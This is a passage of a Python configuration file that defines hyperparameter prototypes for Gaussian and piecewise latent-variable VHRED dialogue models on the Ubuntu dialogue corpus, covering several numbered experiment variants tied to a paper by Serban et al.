state['qdim_encoder'] = 1000
state['qdim_decoder'] = 4000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 300
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 300
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
state['gate_latent_piecewise_per_utterance'] = False
return state
###
### Ubuntu - Hyperparameter search for (Gaussian/Piecewise) VHRED on Ubuntu:
###
### sdim = 1000
### qdim_encoder = 1000
### qdim_decoder = 2000
### rankdim = 400
### deep_utterance_decoder_input={False,True}
###
###
### bidirectional_utterance_encoder = True
### reset_utterance_encoder_at_end_of_utterance = False
### reset_utterance_decoder_at_end_of_utterance = True
### lr = 0.0002
### bs = 80
### normop_type = 'LN'
###
### For latent models, we also experiment with kl_divergence_max_weight={0.25, 0.50, 0.75}
### NOTE: In this case, we early stop according to the reweighted lower bound!
###
###
# This is the Ubuntu HRED baseline used in "Piecewise Latent Variables for Neural Variational Text Processing" by Serban et al.
# It achieved best performance w.r.t. F1 activity performance on the validation set among all HRED baseline models
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Baseline_Exp1():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = False
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = False
state['patience'] = 20
return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Baseline_Exp2():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = False
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = True
state['patience'] = 20
return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp1():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = False
state['patience'] = 20
return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp2():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = False
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = False
state['patience'] = 20
return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp3():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = False
state['patience'] = 20
return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp4():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = True
state['patience'] = 20
return state
# This is the Ubuntu P-VHRED model used in "Piecewise Latent Variables for Neural Variational Text Processing" by Serban et al.
# It achieved best performance w.r.t. F1 activity performance on the validation set among all P-VHRED models
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp5():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = False
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = True
state['patience'] = 20
return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp6():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = True
state['patience'] = 20
return state
# This is the Ubuntu G-VHRED model used in "Piecewise Latent Variables for Neural Variational Text Processing" by Serban et al.
# It achieved best performance w.r.t. F1 activity performance on the validation set among all G-VHRED models
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp7():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = True
state['patience'] = 20
state['kl_divergence_max_weight'] = 0.25
return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp8():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = False
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = True
state['patience'] = 20
state['kl_divergence_max_weight'] = 0.25
return state
# This is the Ubuntu H-VHRED model used in "Piecewise Latent Variables for Neural Variational Text Processing" by Serban et al.
# It achieved best performance w.r.t. F1 activity performance on the validation set among all H-VHRED models
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp9():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = True
state['patience'] = 20
state['kl_divergence_max_weight'] = 0.25
return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp10():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = True
state['patience'] = 20
state['kl_divergence_max_weight'] = 0.5
return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp11():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
